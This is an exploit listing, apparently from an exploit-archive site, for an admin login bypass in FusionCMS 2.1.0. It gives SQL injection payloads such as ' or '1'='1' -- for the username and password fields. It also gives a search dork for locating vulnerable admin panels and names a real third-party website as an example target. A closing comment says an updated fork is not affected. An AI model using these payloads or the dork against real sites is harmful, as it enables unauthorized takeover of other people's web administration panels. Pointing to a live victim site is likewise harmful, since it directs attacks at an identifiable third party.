Fusioncms 2.1 Admin Panel Bypass

2019.01.30
tr AtakBey (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### # Exploit Title: Fusioncms 2.1 Admin Panel Bypass # Dork: /cmsadmin/login.php intext: ::Administration Login:: # Date: 29-01-2019 # Exploit Author: AtakBey,SecreTTeaM # Vendor Homepage: https://github.com/Desch/FusionCMS # Software Link: https://github.com/Desch/FusionCMS # Version: 2.1.0 # Category: Webapps # Tested on: Linux,Windows # CVE: N/A #################################################################### # Search Engine Bing.com # Benutzername: ' or '1'='1' -- ' ~ ' or '1'='1' ({ ' ~ ' or '1'='1' /* # Passwort: ' or '1'='1' -- ' ~ ' or '1'='1' ({ ' ~ ' or '1'='1' /* # ScreenShot: https://i.hizliresim.com/AD1PY0.png # Example Panel : https://www.scheinerwein.at/cmsadmin/login.php ####################################################################


Vote for this issue:
66%
34%

Comment it here.
SkyLiner | Date: 2020-05-09 21:04 CET+1
Hello, This exploit may be done on - https://github.com/Desch/FusionCMS - but on our updated version - https://github.com/FusionGen/FusionGen - it does not!

Copyright 2025, cxsecurity.com

 

Back to Top